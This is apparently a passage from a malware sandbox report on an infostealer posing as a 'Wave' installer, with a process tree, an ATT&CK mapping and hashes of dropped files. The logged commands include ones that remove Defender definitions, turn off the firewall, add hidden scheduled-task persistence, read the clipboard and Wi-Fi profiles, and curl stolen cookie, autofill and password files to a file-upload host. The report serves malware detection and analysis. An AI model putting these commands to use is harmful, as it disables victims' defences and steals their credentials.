        wmic os get csname, description, installdate, organization, registereduser, numberofprocesses
        6⤵
        
        PID:17244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
      4⤵
      PID:2564
    - - C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        5⤵
        
        PID:5844
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:1904
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        6⤵
        
        PID:5244
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        7⤵
        
        PID:5596
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:3444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:6284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:10104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:11280
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:15268
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:14968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:7748
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:8488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:8352
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:13752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:10972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        8⤵
        
        PID:13152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        8⤵
        
        PID:11900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        8⤵
        
        PID:14548
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        6⤵
        
        PID:3332
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        7⤵
        
        PID:6932
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:3148
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:8876
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:13880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:12660
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:14832
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        6⤵
        
        PID:7704
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        7⤵
        
        PID:8456
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        6⤵
        
        PID:10088
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        7⤵
        
        PID:14764
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        6⤵
        
        PID:10396
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        6⤵
        
        PID:12764
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        6⤵
        
        PID:14472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
      4⤵
      PID:6068
    - - C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        5⤵
        
        PID:3404
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:5344
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        6⤵
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        7⤵
        
        PID:1944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        8⤵
        
        PID:2892
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:7048
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:5496
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        10⤵
        
        PID:7200
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        10⤵
        
        PID:9872
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        11⤵
        
        PID:12048
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        10⤵
        
        PID:10408
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        11⤵
        
        PID:11948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:7320
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        9⤵
        
        PID:10608
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        8⤵
        
        PID:6328
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        9⤵
        
        PID:16328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        8⤵
        
        PID:11492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        8⤵
        
        PID:11704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        8⤵
        
        PID:17080
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        6⤵
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        7⤵
        
        PID:7856
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests"
        6⤵
        
        PID:9420
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install requests
        7⤵
        
        PID:10576
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex"
        6⤵
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE
        
        C:\Users\Admin\AppData\Local\Temp\STARTUP.EXE -m pip install pycryptodomex
        7⤵
        
        PID:16088
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
        6⤵
        
        PID:13144
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
        6⤵
        
        PID:8040
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
        6⤵
        
        PID:14720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\\Program Files\\Windows Defender\\MpCmdRun.exe -RemoveDefinitions -All"
      4⤵
      PID:5292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell "netsh advfirewall set allprofiles state off" "
      4⤵
      PID:5316
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "netsh advfirewall set allprofiles state off"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4932
      - C:\Windows\system32\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
        6⤵
        Modifies Windows Firewall
        
        PID:12684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
      4⤵
      PID:5856
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
        5⤵
        
        PID:2500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2> nul
      4⤵
      PID:4848
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
        5⤵
        
        PID:6940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
      4⤵
      PID:6272
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /im firefox.exe /t /f
        5⤵
        Kills process with taskkill
        
        PID:7612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
      4⤵
      PID:10216
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
        5⤵
        
        PID:10328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Get-Clipboard -TextFormatType Text"
      4⤵
      Clipboard Data
      PID:10224
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic os get csname, description, installdate, organization, registereduser, numberofprocesses
      4⤵
      PID:8644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcook.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:10344
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpcook.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:10448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpautofill.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:11644
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wpautofill.txt" https://store4.gofile.io/uploadFile
        5⤵
        
        PID:14304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\wppassw.txt" https://store4.gofile.io/uploadFile"
      4⤵
      PID:9300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /NH /FO CSV"
      4⤵
      PID:11192
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /NH /FO CSV"
      4⤵
      PID:10800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /NH /FO CSV"
      4⤵
      PID:14280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /NH /FO CSV"
      4⤵
      PID:14688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /NH /FO CSV"
      4⤵
      PID:14752
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /NH /FO CSV"
      4⤵
      PID:15860
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /NH /FO CSV"
      4⤵
      PID:16228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /NH /FO CSV"
      4⤵
      PID:17200
- C:\Users\Admin\AppData\Local\Temp\SYS32.EXE
  "C:\Users\Admin\AppData\Local\Temp\SYS32.EXE"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Users\Admin\AppData\Local\Temp\SYSTEM.EXE
  "C:\Users\Admin\AppData\Local\Temp\SYSTEM.EXE"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3016
- - C:\Users\Admin\AppData\Local\Temp\SYSTEM.EXE
    "C:\Users\Admin\AppData\Local\Temp\SYSTEM.EXE"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:3816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:396
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1972
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
      4⤵
      PID:2584
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        5⤵
        
        PID:2252
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "gdb --version"
      4⤵
      PID:4772
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:4744
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
      4⤵
      PID:3832
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        5⤵
        
        PID:1468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:2020
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:2348
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:1904
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:3840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:2360
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
        5⤵
        Views/modifies file attributes
        
        PID:3412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "schtasks /query /TN "ExelaUpdateService""
      4⤵
      PID:3400
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /query /TN "ExelaUpdateService"
        5⤵
        
        PID:220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc onlogon /rl highest /tn "ExelaUpdateService" /tr "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
      4⤵
      PID:4064
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "ExelaUpdateService" /tr "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc hourly /mo 1 /rl highest /tn "ExelaUpdateService2" /tr "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
      4⤵
      PID:1712
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc hourly /mo 1 /rl highest /tn "ExelaUpdateService2" /tr "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:2500
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:1908
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
      4⤵
      PID:744
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        5⤵
        
        PID:1744
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:4664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
      4⤵
      PID:1584
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        5⤵
        
        PID:3976
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:728
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4424
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:1932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
      4⤵
      Clipboard Data
      PID:4388
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        5⤵
        Clipboard Data
        
        PID:908
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
      4⤵
      Network Service Discovery
      PID:6000
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:5744
    - - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        5⤵
        
        PID:13132
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3148
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5632
- C:\Users\Admin\AppData\Local\Temp\WAVE-SETUP.EXE
  "C:\Users\Admin\AppData\Local\Temp\WAVE-SETUP.EXE"
  2⤵
  PID:3616
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq Wave.exe" /FO csv | "C:\Windows\system32\find.exe" "Wave.exe"
    3⤵
    PID:1204
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FI "USERNAME eq Admin" /FI "IMAGENAME eq Wave.exe" /FO csv
      4⤵
      Enumerates processes with tasklist
      PID:976
  - - C:\Windows\SysWOW64\find.exe
      "C:\Windows\system32\find.exe" "Wave.exe"
      4⤵
      PID:2632

C:\Users\Admin\AppData\Local\Programs\Wave\Wave.exe
"C:\Users\Admin\AppData\Local\Programs\Wave\Wave.exe"
1⤵
PID:2016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "NET SESSION"
  2⤵
  PID:8656
- - C:\Windows\system32\net.exe
    NET SESSION
    3⤵
    PID:13256
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 SESSION
      4⤵
      PID:16100
- C:\Users\Admin\AppData\Local\Programs\Wave\Wave.exe
  "C:\Users\Admin\AppData\Local\Programs\Wave\Wave.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Wave" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1844,i,15642103825358543801,16566917362401112968,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1836 /prefetch:2
  2⤵
  PID:9088

C:\Users\Admin\AppData\Local\Programs\Wave\Wave.exe
"C:\Users\Admin\AppData\Local\Programs\Wave\Wave.exe"
1⤵
PID:1804
- C:\Users\Admin\AppData\Local\Programs\Wave\Wave.exe
  "C:\Users\Admin\AppData\Local\Programs\Wave\Wave.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Wave" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1700,i,11832560170088158952,15033019821057879827,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1692 /prefetch:2
  2⤵
  PID:9548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "NET SESSION"
  2⤵
  PID:9804
- - C:\Windows\system32\net.exe
    NET SESSION
    3⤵
    PID:12324
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 SESSION
      4⤵
      PID:15624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Network Service Discovery

T1046

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Programs\Wave\chrome_100_percent.pak

Filesize
148KB

MD5
cb4f128469cd84711ed1c9c02212c7a8

SHA1
8ae60303be80b74163d5c4132de4a465a1eafc52

SHA256
7dd5485def22a53c0635efdf8ae900f147ec8c8a22b9ed71c24668075dd605d3

SHA512
0f0febe4ee321eb09d6a841fe3460d1f5b657b449058653111e7d0f7a9f36620b3d30369e367235948529409a6ce0ce625aede0c61b60926dec4d2c308306277

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cookies.db

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\HistoryData.db

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\Logins.db

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\Logins.db

Filesize
46KB

MD5
14ccc9293153deacbb9a20ee8f6ff1b7

SHA1
